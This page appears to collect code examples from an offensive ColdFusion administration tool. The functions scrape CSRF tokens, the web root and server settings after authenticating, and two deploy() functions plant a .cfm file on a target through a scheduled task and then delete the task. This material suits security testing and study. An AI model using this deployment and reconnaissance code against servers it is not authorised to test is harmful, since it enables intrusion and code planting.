Пример #1
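def fetch_csrf(ip, fingerprint, url):
    """ Fetch the session cookie and, where the version uses one, the CSRF
    token embedded in the page at `url`.

    The token is tied to the session, so the page is requested with the
    same cookie that checkAuth() handed back.

    Returns a tuple of (cookie, csrftoken); csrftoken is None when the
    version is not 9.0/10.0/11.0 or the page carries no token.  Returns
    False when no session could be obtained, and None when the page request
    did not answer with HTTP 200.

    Both values are live session credentials; callers should keep them out
    of log output.
    """

    # NOTE(review): `title` is not defined in this function; it is assumed
    # to be a module-level name -- confirm against the rest of the file.
    auth = checkAuth(ip, fingerprint.port, title, fingerprint.version)
    if not auth:
        # checked before indexing on every path, so a failed login is
        # reported instead of raising on `auth[0]`
        utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port),
                    LOG.ERROR)
        return False
    cookie = auth[0]

    if fingerprint.version not in ['9.0', '10.0', '11.0']:
        # versions <= 8.x do not use a CSRF token
        return (cookie, None)

    response = utility.requests_get(url, cookies=cookie)

    # compare by value; `is 200` only holds through the interpreter's
    # small-integer cache
    if response.status_code != 200:
        return None

    token = findall("name=\"csrftoken\" value=\"(.*?)\">",
                    response.content)
    if token:
        return (cookie, token[0])

    utility.Msg("CSRF appears to be disabled.", LOG.DEBUG)
    return (cookie, None)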
Пример #2
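def fetch_csrf(ip, fingerprint, url):
    """ Most of these requests use a CSRF token; it can be read from the
    page at `url` as long as the request carries the same session cookie.

    Returns a tuple of (cookie, csrftoken).  csrftoken is None for versions
    other than 9.0/10.0 and when the page holds no token.  Returns False if
    checkAuth() gave back nothing usable, and None if the page request did
    not answer with HTTP 200.
    """

    # NOTE(review): `title` is read from outside this function (presumably a
    # module-level constant) -- confirm.
    cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version)
    if not cookies:
        # one check covers both version paths, so neither indexes a falsy
        # checkAuth() result
        utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port), LOG.ERROR)
        return False

    if fingerprint.version not in ['9.0', '10.0']:
        # versions <= 8.x do not use a CSRF token
        return (cookies[0], None)

    # lets try and fetch CSRF
    response = utility.requests_get(url, cookies=cookies[0])

    # value comparison: identity (`is`) on an int is an interpreter detail
    if response.status_code == 200:
        token = findall("name=\"csrftoken\" value=\"(.*?)\">", response.content)
        if len(token) > 0:
            return (cookies[0], token[0])

        utility.Msg("CSRF appears to be disabled.", LOG.DEBUG)
        return (cookies[0], None)

    # any other status: there is no cookie/token pair to hand back
    return None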
Пример #3
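def fetch_webroot(ip, fingerprint):
    """ Pick out the web root from the settings summary page.

    The page is /CFIDE/administrator/reports/index.cfm, requested with the
    session cookie from checkAuth().

    Returns the web root as a string, or False when no session was
    obtained, the page did not answer with HTTP 200, or no matching table
    cell was found.
    """

    # NOTE(review): the scheme is hard-coded to http, so the session cookie
    # below travels unencrypted.
    url = "http://{0}:{1}/CFIDE/administrator/reports/index.cfm"\
                                        .format(ip, fingerprint.port)

    # NOTE(review): `title` is assumed to be a module-level name -- confirm.
    cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version)
    if not cookies:
        utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port), LOG.ERROR)
        return False

    req = utility.requests_get(url, cookies=cookies[0])

    # compare by value rather than identity, and report every failure the
    # same way (False) instead of falling off the end of the function
    if req.status_code != 200:
        return False

    root_regex = "CFIDE &nbsp;</td><td scope=row class=\"cellRightAndBottomBlueSide\">(.*?)</td>"
    if fingerprint.version in ["7.0"]:
        # for 7.0 the pattern is used without the scope=row attribute
        root_regex = root_regex.replace("scope=row ", "")

    # newlines, tabs and carriage returns are removed before matching
    data = findall(root_regex, req.content.translate(None, "\n\t\r"))
    if not data:
        return False

    # decode the HTML entities for '\' and ':' and drop the last seven
    # characters (presumably trailing markup such as " &nbsp;" -- confirm)
    return data[0].replace("&#x5c;", "\\").replace("&#x3a;", ":")[:-7]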
Пример #4
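def fetch_webroot(ip, fingerprint):
    """ Pick out the web root from the settings summary page.

    Requests /CFIDE/administrator/reports/index.cfm using the cookie that
    checkAuth() returns and scrapes the table cell that follows the
    "CFIDE" label.

    Returns the path as a string.  Returns False if authentication failed,
    if the response status was not 200, or if the cell could not be found.
    """

    url = "http://{0}:{1}/CFIDE/administrator/reports/index.cfm"\
                                        .format(ip, fingerprint.port)

    # NOTE(review): `title` comes from outside this function -- confirm it
    # is defined at module level.
    cookies = checkAuth(ip, fingerprint.port, title, fingerprint.version)
    if cookies:
        # NOTE(review): plain-HTTP URL, so the cookie is sent in the clear
        req = utility.requests_get(url, cookies=cookies[0])
    else:
        utility.Msg("Could not get auth for %s:%s" % (ip, fingerprint.port),
                    LOG.ERROR)
        return False

    # `==` instead of `is`: integer identity is an implementation detail
    if req.status_code == 200:

        root_regex = "CFIDE &nbsp;</td><td scope=row class=\"cellRightAndBottomBlueSide\">(.*?)</td>"
        if fingerprint.version in ["7.0"]:
            # 7.0 is matched without the scope=row attribute
            root_regex = root_regex.replace("scope=row ", "")

        # line breaks and tabs are stripped from the body before matching
        data = findall(root_regex, req.content.translate(None, "\n\t\r"))
        if data:
            # entity-decode '\' and ':'; the final seven characters are
            # cut off (presumably trailing markup -- confirm)
            return data[0].replace("&#x5c;", "\\").replace("&#x3a;", ":")[:-7]

    # non-200 response or no match: same falsy result on both paths
    return False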
Пример #5
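    def run(self, fingerengine, fingerprint):
        """ Request the Coldfusion administrator information page.

        Versions 5.0, 6.0 and 6.1 are handed to self._run5().  For every
        other version the reports index page (the version page for 7.0) is
        requested with the session cookie from checkAuth().  When
        authentication or the request fails, an error is logged and None is
        returned.
        """

        if fingerprint.version in ["5.0", "6.0", "6.1"]:
            return self._run5(fingerengine, fingerprint)

        utility.Msg("Attempting to retrieve Coldfusion info...")

        base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
        uri = "/CFIDE/administrator/reports/index.cfm"

        if fingerprint.version in ["7.0"]:
            uri = '/CFIDE/administrator/settings/version.cfm'

        cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                            fingerprint.title, fingerprint.version)
        if not cookies:
            utility.Msg("Could not get auth for %s:%s" %
                        (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
            return

        # the first element of the checkAuth() result is what gets sent as
        # the request's cookies
        cookies = cookies[0]

        try:
            response = utility.requests_get(base + uri, cookies=cookies)
        except Exception as e:
            # `as` form: valid on Python 2.6+ and 3, unlike `except X, e`
            utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR)
            return

        # NOTE(review): `response` is not used after this point in the code
        # shown; the report parsing is presumably elsewhere -- confirm.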
Пример #6
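    def _run5(self, fingerengine, fingerprint):
        """ Pull sys info from older CF instances; it is quite ugly.

        Handles versions 5.0, 6.0 and 6.1: requests the version page with
        the session cookie from checkAuth(), scrapes key/value table cells
        out of the HTML and prints each pair through utility.Msg().
        Returns None in every case.
        """

        utility.Msg("Attempting to retrieve Coldfusion info...")

        # NOTE(review): checkAuth()'s failure value is not visible here; it
        # is tested for truthiness before indexing so that either a falsy
        # result or a falsy first element ends in the error message below.
        auth = checkAuth(fingerengine.options.ip, fingerprint.port,
                         fingerprint.title, fingerprint.version)
        cookies = auth[0] if auth else None
        if not cookies:
            utility.Msg(
                "Could not get auth for %s:%s" %
                (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
            return

        base = 'http://{0}:{1}'.format(fingerengine.options.ip,
                                       fingerprint.port)

        if fingerprint.version in ['5.0']:
            uri = '/CFIDE/administrator/server_settings/version.cfm'
        elif fingerprint.version in ['6.0', '6.1']:
            uri = '/CFIDE/administrator/settings/version.cfm'
        else:
            # without this branch `uri` would be unbound at the request below
            utility.Msg("Unsupported Coldfusion version %s" %
                        fingerprint.version, LOG.ERROR)
            return

        response = utility.requests_get(base + uri, cookies=cookies)

        # line breaks are stripped once and the result reused by every pattern
        page = response.content.translate(None, '\r\n')

        if fingerprint.version in ['5.0']:

            # the first key cell and the first two value cells are skipped
            keys = findall("<td height=\".*?\" nowrap>(.*?)</td>", page)[1:]
            values = findall("<td>(.*?)</td>", page)
            for (key, value) in zip(keys, values[2:]):
                k = findall("class=\"text2\">(.*?)</p>",
                            key)[0].replace("&nbsp;", '').rstrip()
                v = findall(">(.*?)\t", value)[0].replace(' ', '')
                utility.Msg("  %s: %s" % (k, v))

        else:

            # 6.0 / 6.1: the last two rows of each column are dropped
            keys = findall("<td height=\"18\" nowrap>(.*?)</td>", page)
            values = findall(
                "<td width=\"100%\" class=\"color-row\">(.*?)</td>", page)

            for (key, value) in zip(keys[:-2], values[:-2]):

                k = findall("&nbsp;(.*?)&nbsp;", key)[0].strip()
                v = findall("&nbsp;(.*?)\t", value)[0].strip()
                utility.Msg("  %s: %s" % (k, v))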
Пример #7
    def run(self, fingerengine, fingerprint):
        """ Print remote Coldfusion settings scraped from the reports index
        page (the version page for 7.0).

        Only the first 26 label/value pairs are printed, since the report
        contains a lot of extraneous entries.  Versions 5.0, 6.0 and 6.1
        are delegated to self._run5().
        """

        if fingerprint.version in ["5.0", "6.0", "6.1"]:
            return self._run5(fingerengine, fingerprint)

        utility.Msg("Attempting to retrieve Coldfusion info...")

        target = "http://{0}:{1}".format(fingerengine.options.ip,
                                         fingerprint.port)
        if fingerprint.version in ["7.0"]:
            target += '/CFIDE/administrator/settings/version.cfm'
        else:
            target += "/CFIDE/administrator/reports/index.cfm"

        auth = checkAuth(fingerengine.options.ip, fingerprint.port,
                         fingerprint.title, fingerprint.version)
        if not auth:
            utility.Msg(
                "Could not get auth for %s:%s" %
                (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
            return
        session = auth[0]

        try:
            response = utility.requests_get(target, cookies=session)
        except Exception as e:
            utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR)
            return

        if response.status_code != 200:
            return

        # versionRegex() supplies two patterns: [0] for the row labels,
        # [1] for the row values
        patterns = self.versionRegex(fingerprint.version)

        # both patterns run against the body with newlines/tabs removed
        flattened = response.content.translate(None, "\n\t\r")
        labels = findall(patterns[0], flattened)
        cells = findall(patterns[1], flattened)

        # pad
        if fingerprint.version in ["8.0", "9.0", "10.0", '11.0']:
            labels.insert(0, "Version")

        # each value is printed without its last seven characters
        for (label, cell) in zip(labels, cells)[:26]:
            utility.Msg('  %s: %s' % (label, cell[:-7]))
Пример #8
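    def _run5(self, fingerengine, fingerprint):
        """ Pull sys info from older CF instances; it is quite ugly.

        Covers 5.0, 6.0 and 6.1.  The version page is requested with the
        cookie obtained from checkAuth(), and the key/value cells found in
        it are printed one pair per line through utility.Msg().  Nothing is
        returned.
        """

        utility.Msg("Attempting to retrieve Coldfusion info...")

        host = fingerengine.options.ip

        # Index the checkAuth() result only once it is known to be truthy.
        # NOTE(review): its exact failure value is not visible from here.
        result = checkAuth(host, fingerprint.port,
                           fingerprint.title, fingerprint.version)
        if not result or not result[0]:
            utility.Msg("Could not get auth for %s:%s" %
                         (host, fingerprint.port), LOG.ERROR)
            return
        cookies = result[0]

        # Settle the page up front; any other version has no known page and
        # would otherwise leave `uri` unbound.
        is_v5 = fingerprint.version in ['5.0']
        if is_v5:
            uri = '/CFIDE/administrator/server_settings/version.cfm'
        elif fingerprint.version in ['6.0', '6.1']:
            uri = '/CFIDE/administrator/settings/version.cfm'
        else:
            utility.Msg("Unsupported Coldfusion version %s" %
                        fingerprint.version, LOG.ERROR)
            return

        base = 'http://{0}:{1}'.format(host, fingerprint.port)
        response = utility.requests_get(base+uri, cookies=cookies)

        # CR/LF are removed a single time; every pattern below reads `body`
        body = response.content.translate(None, '\r\n')

        if is_v5:

            # skips the first key cell and the first two value cells
            keys = findall("<td height=\".*?\" nowrap>(.*?)</td>", body)[1:]
            values = findall("<td>(.*?)</td>", body)[2:]
            for (key, value) in zip(keys, values):
                k = findall("class=\"text2\">(.*?)</p>", key)[0].replace("&nbsp;",'').rstrip()
                v = findall(">(.*?)\t", value)[0].replace(' ','')
                utility.Msg("  %s: %s" % (k, v))

        else:

            # 6.0 / 6.1: the trailing two rows of both columns are ignored
            keys = findall("<td height=\"18\" nowrap>(.*?)</td>", body)
            values = findall("<td width=\"100%\" class=\"color-row\">(.*?)</td>",
                             body)

            for (key, value) in zip(keys[:-2], values[:-2]):

                k = findall("&nbsp;(.*?)&nbsp;", key)[0].strip()
                v = findall("&nbsp;(.*?)\t", value)[0].strip()
                utility.Msg("  %s: %s" % (k, v))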
Пример #9
    def run(self, fingerengine, fingerprint):
        """ Print remote Coldfusion settings scraped from the reports index
        page.

        The page is first requested without a session; if the login page
        comes back instead, checkAuth() is used and the request repeated
        with its cookie.  Only the first 26 label/value pairs are printed,
        as the report has a lot of extraneous entries.
        """

        utility.Msg("Attempting to retrieve Coldfusion info...")

        target = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port) \
                 + "/CFIDE/administrator/reports/index.cfm"

        response = utility.requests_get(target)
        login_page = response.status_code == 200 and \
                     "ColdFusion Administrator Login" in response.content

        if login_page:
            utility.Msg("Host %s:%s requires auth, checking..." %
                        (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
            auth = checkAuth(fingerengine.options.ip, fingerprint.port,
                             fingerprint.title, fingerprint.version)

            if not auth:
                utility.Msg("Could not get auth for %s:%s" %
                            (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
                return

            response = utility.requests_get(target, cookies=auth[0])

        if response.status_code != 200:
            return

        # both patterns run against the body with newlines/tabs removed
        flattened = response.content.translate(None, "\n\t\r")
        labels = findall("<td scope=row nowrap class=\"cell3BlueSides\">(.*?)</td>",
                         flattened)
        cells = findall("<td scope=row class=\"cellRightAndBottomBlueSide\">(.*?)</td>",
                        flattened)

        # pad
        labels.insert(0, "Version")

        # each value is printed without its last seven characters
        for (label, cell) in zip(labels, cells)[:26]:
            utility.Msg('  %s: %s' % (label, cell[:-7]))
Пример #10
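def deploy(fingerengine, fingerprint):
    """ Scheduled Task deployer for older versions; radically different
    than newer systems, so it warrants its own deployer.

    Sequence: authenticate, look up the web root, create a scheduled task,
    invoke it, then delete it.  Each failure is logged and ends the run;
    nothing is returned.

    If delete_task() fails the task is left registered on the server, which
    is the artifact to look for when cleaning up afterwards.
    """

    cfm_path = abspath(fingerengine.options.deploy)
    # NOTE(review): parse_war_path() is defined elsewhere; its result is
    # used below as the task name -- confirm what it returns.
    cfm_file = parse_war_path(cfm_path, True)
    dip = fingerengine.options.ip

    # NOTE(review): `title` is assumed to be a module-level name.  The
    # checkAuth() result is tested before indexing so a failed login reaches
    # the error message below instead of raising on `[0]`.
    auth = checkAuth(dip, fingerprint.port, title, fingerprint.version)
    cookie = auth[0] if auth else None
    if not cookie:
        utility.Msg("Could not get auth", LOG.ERROR)
        return

    utility.Msg("Preparing to deploy {0}...".format(cfm_file))
    utility.Msg("Fetching web root...", LOG.DEBUG)

    root = fetch_webroot(dip, fingerprint, cookie)
    if not root:
        utility.Msg("Unable to fetch web root.", LOG.ERROR)
        return

    # create the scheduled task
    utility.Msg("Web root found at %s" % root, LOG.DEBUG)
    utility.Msg("Creating scheduled task...")

    if not create_task(dip, fingerprint, cfm_file, root, cookie):
        return

    # invoke the task
    utility.Msg("Task %s created, invoking..." % cfm_file)
    run_task(dip, fingerprint, cfm_path, cookie)

    # cleanup
    utility.Msg("Cleaning up...")
    if not delete_task(dip, fingerprint, cfm_file, cookie):
        utility.Msg("Failed to remove task.  May require manual removal.",
                    LOG.ERROR)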
Пример #11
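def deploy(fingerengine, fingerprint):
	""" Scheduled Task deployer for older versions; radically different
	than newer systems, so it warrants its own deployer.

	Runs in order: authentication, web root lookup, task creation, task
	invocation, task deletion.  A failing step is logged and stops the
	run.  Returns None.

	A failed deletion leaves the task registered on the server; the log
	line at the end is the only record of that.
	"""

	cfm_path = abspath(fingerengine.options.deploy)
	# NOTE(review): parse_war_path() lives elsewhere; its result serves as
	# the task name in the calls below -- confirm.
	cfm_file = parse_war_path(cfm_path, True)
	dip = fingerengine.options.ip

	# Test the checkAuth() result before taking element 0, so that a
	# failed login is reported rather than raising.
	# NOTE(review): `title` is assumed to be defined at module level.
	auth = checkAuth(dip, fingerprint.port, title, fingerprint.version)
	if not auth or not auth[0]:
		utility.Msg("Could not get auth", LOG.ERROR)
		return
	cookie = auth[0]

	utility.Msg("Preparing to deploy {0}...".format(cfm_file))
	utility.Msg("Fetching web root...", LOG.DEBUG)

	root = fetch_webroot(dip, fingerprint, cookie)
	if not root:
		utility.Msg("Unable to fetch web root.", LOG.ERROR)
		return

	# create the scheduled task
	utility.Msg("Web root found at %s" % root, LOG.DEBUG)
	utility.Msg("Creating scheduled task...")

	if not create_task(dip, fingerprint, cfm_file, root, cookie):
		return

	# invoke the task
	utility.Msg("Task %s created, invoking..." % cfm_file)
	run_task(dip, fingerprint, cfm_path, cookie)

	# cleanup
	utility.Msg("Cleaning up...")
	if not delete_task(dip, fingerprint, cfm_file, cookie):
		utility.Msg("Failed to remove task.  May require manual removal.", LOG.ERROR)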
Пример #12
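class Auxiliary:
    """ Auxiliary module that prints settings scraped from a Coldfusion
    administrator page.
    """

    def __init__(self):
        self.name = 'Dump host information'
        # versions this module's check() accepts
        self.versions = ['7.0', '8.0', '9.0', '10.0']
        self.show = True
        self.flag = 'cf-info'

    def check(self, fingerprint):
        """ Return True when the fingerprint's title is CINTERFACES.CFM and
        its version is one of self.versions, otherwise False.
        """
        return bool(fingerprint.title == CINTERFACES.CFM and
                    fingerprint.version in self.versions)

    def run(self, fingerengine, fingerprint):
        """ Obtains remote Coldfusion information from the reports index page.
        This pulls the first 26 entries from this report, as there's lots of
        extraneous stuff.  Perhaps if requested I'll prompt to extend to the
        remainder of the settings.

        The page is first requested without a session; if the login page
        comes back, checkAuth() is used and the request is repeated with
        its cookie.  Returns None.
        """

        utility.Msg("Attempting to retrieve Coldfusion info...")

        base = "http://{0}:{1}".format(fingerengine.options.ip,
                                       fingerprint.port)
        uri = "/CFIDE/administrator/reports/index.cfm"

        if fingerprint.version in ["7.0"]:
            uri = '/CFIDE/administrator/settings/version.cfm'

        try:
            response = utility.requests_get(base + uri)
        except Exception as e:
            # `as` form: valid on Python 2.6+ and 3, unlike `except X, e`
            utility.Msg("Failed to fetch info: %s" % e, LOG.ERROR)
            return

        if response.status_code == 200 and "ColdFusion Administrator Login" \
                                 in response.content:

            utility.Msg(
                "Host %s:%s requires auth, checking..." %
                (fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
            cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
                                fingerprint.title, fingerprint.version)

            if cookies:
                # NOTE(review): unlike the first request, this one is not
                # wrapped in try/except -- confirm that is intended
                response = utility.requests_get(base + uri, cookies=cookies[0])
            else:
                utility.Msg(
                    "Could not get auth for %s:%s" %
                    (fingerengine.options.ip, fingerprint.port), LOG.ERROR)
                return

        if response.status_code == 200:

            # versionRegex() is not defined in the code shown; its result is
            # used as [0] = label pattern, [1] = value pattern
            regex = self.versionRegex(fingerprint.version)

            # strip newlines/tabs once and reuse the result for both patterns
            page = response.content.translate(None, "\n\t\r")
            types = findall(regex[0], page)
            values = findall(regex[1], page)

            # pad
            if fingerprint.version in ["8.0", "9.0", "10.0"]:
                types.insert(0, "Version")

            # the loop variable no longer reuses the name of the list being
            # iterated; each value is printed without its last 7 characters
            for (row, value) in zip(types, values)[:26]:
                utility.Msg('  %s: %s' % (row, value[:-7]))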